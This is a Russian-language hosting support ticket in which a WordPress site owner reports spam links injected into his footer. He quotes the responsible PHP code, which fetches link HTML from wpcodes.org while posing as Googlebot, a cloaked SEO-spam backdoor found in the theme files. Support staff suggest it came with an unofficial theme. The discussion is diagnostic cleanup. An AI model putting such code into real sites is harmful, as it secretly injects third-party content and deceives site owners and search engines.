ЗАРЕГИСТРИРОВАТЬСЯ

Варианты решения Ваших вопросов

  хостинг
<< Назад       Взлом сайта

Вопрос: Доброго времени суток. У меня проблема мой сайт взломали смотрю кеше яндекса http://hghltd.yandex.net/yandbtm?lang=ru&fmode=inject&tld=ru&la=1429969664&text=%D1%87%D0%B5%D0%BC%20%D0%B1%D0%BB%D0%BE%D0%BA%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D1%82%D1%8C%20antivirus%20aliexpress.com%20%D0%BD%D0%B0%20%D1%82%D0%B5%D0%BB%D0%B5%D1%84%D0%BE%D0%BD%D0%B5&url=http%3A%2F%2Fallonline-shops.ru%2Fotvet-pochemu-ne-rabotaet-ili-ne-okryivaetsya-sayt-aliekspress.html&l10n=ru&mime=html&sign=ddc38f3b47c2648bc3614d260d348217&keyno=0 на нем крутят посторонние ссылки в подвале сайта. Подскажите что мне делать, я щас поменяю пароль, но ведь в коде сайта вирусный код останется как его обнаружить и удалить??
Ответ:

Здравствуйте. а на самом сайте, без кеша, вы видите эти ссылки?

Вопрос: нет не вижу
Вопрос: <!-- best-wordpress-templates.ru/rules/ правила ссылки >> --> фрукты вот в коде кеша эта ссылка остальное все вроде хорошо и остальные мои ссылки
Вопрос: ссылки на Вконтакте это мои
Ответ:

убедительная просьба не приводить код в тикетах.  так же укажите место на сайте где можно увидеть эти ссылки. именно на сайте а не в кеше яндекса

Вопрос: все устрантил вот этот код //$links = new Get_links(); $links = $links->get_remote(); echo $links; , а как найти мне веб шел??
Вопрос: именно на сайте а не в кеше яндекса смотрите подвал моего сайта там ссылка фрукты
Ответ:

адрес сайта укажите пожалуйста

Вопрос: ___//allonline-shops.ru/ мой сайт те ссылке что в подвале на Контакт это мое, в кеше слово фрукты __kackest.com/frukty-pri-saxarnom-diabete/ хакерская ссылка. Как найти мне веб -шелл так как они и дальше будут ставить левые ссылки
Вопрос: ___//allonline-shops.ru/ мой сайт те ссылке что в подвале на Контакт это мое, в кеше слово фрукты __kackest.com/frukty-pri-saxarnom-diabete/ хакерская ссылка. Как найти мне веб -шелл так как они и дальше будут ставить левые ссылки
Ответ:

в каком кеше? при чем тут кеш? где на вашем сайте прямо сейчас эти "фрукты" и как то не вяжутся "фрукты" с хакерскими ссылками.   сейчас, не трогая никакой кеш, в каком месте сайта вы прямо сейчас видите эти ссылки? прямо сейчас они есть или нет?

Вопрос: Рассказываю хакеры поставили свой код в мой сайт. Их код отрабатывает только когда на сайт заходят поисковые системы типа Яндекса гугла и др (по Юзер агенту ) . Как только поисковая система зашла на на сайт их код генерирует ссылки не другие сайты. Вот их вирусный код class Get_links { /* var $host = 'wpcodes.org'; var $path = '/system.php'; var $_socket_timeout = 5; function get_remote() { $req_url = 'http://'.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']); $_user_agent = "Mozilla/5.0 (compatible; Googlebot/2.1; ".$req_url.")"; $links_class = new Get_links(); $host = $links_class->host; $path = $links_class->path; $_socket_timeout = $links_class->_socket_timeout; //$_user_agent = $links_class->_user_agent; @ini_set('allow_url_fopen', 1); @ini_set('default_socket_timeout', $_socket_timeout); @ini_set('user_agent', $_user_agent); if (function_exists('file_get_contents')) { $opts = array( 'http'=>array( 'method'=>"GET", 'header'=>"Referer: {$req_url}\r\n". "User-Agent: {$_user_agent}\r\n" ) ); $context = stream_context_create($opts); $data = @file_get_contents('http://' . $host . $path, false, $context); preg_match('/(\<\!--link--\>)(.*?)(\<\!--link--\>)/', $data, $data); $data = @$data[2]; return $data; } return '<!--link error-->'; } */ Если вы не знаете про черные методы оптимизации и про веб-шелы советует почитать, т.к это серьезная информационная угроза
Ответ:

где вы взяли этот код? каким образом вы решили что его поставили хакеры а не что он был изначально в вашем сайте в теме или плагинах?

все файлы пользователей регулярно проверяются тремя антивирусами. на вашем аккаунте никогда никаких вебшелов найдено небыло.

Какая тема и плагины стоят на сайте? практически все бесплатные неофициальные темы и плагины могут иметь встроеные трояны. рекомендуем Вам

1. сделать полный бекап, это обязательно ДО того как делать какие либо действия , и скачать его к себе на компьютер

2. проверить все плагины и темы

3 обновить сайт до самой последней версии движка  , так же поступить с плагинами и регулярно проводить обновления.

Вопрос: Тема RedFashion код нашел в файле Подвал (footer.php) и файле functions.php поставил код в коментарии. плагины : 1. akismet 2. cyr2lat 3. google-sitemap-generator 4. wp-ds-blog-map 5. wpfront-scroll-top Щас буду смотреть на время модификации файлов
Ответ:

это файл Вашей темы. значит есть вероятность что этот код присутствовал в ней изначально. сверьтесь с оригиналом темы

 

Вопрос: хорошо спасибо буду решать вопрос. прогоняю по вирусным базам, ищу недавний модификацию файлов, веб шелы не исключаю что шаблон червичный
Ответ:

вебшелов . явных, у Вас нет, их бы давно обнаружили антивирусы.


<< Назад

© 2006 - 2017 Empire Host. All rights reserved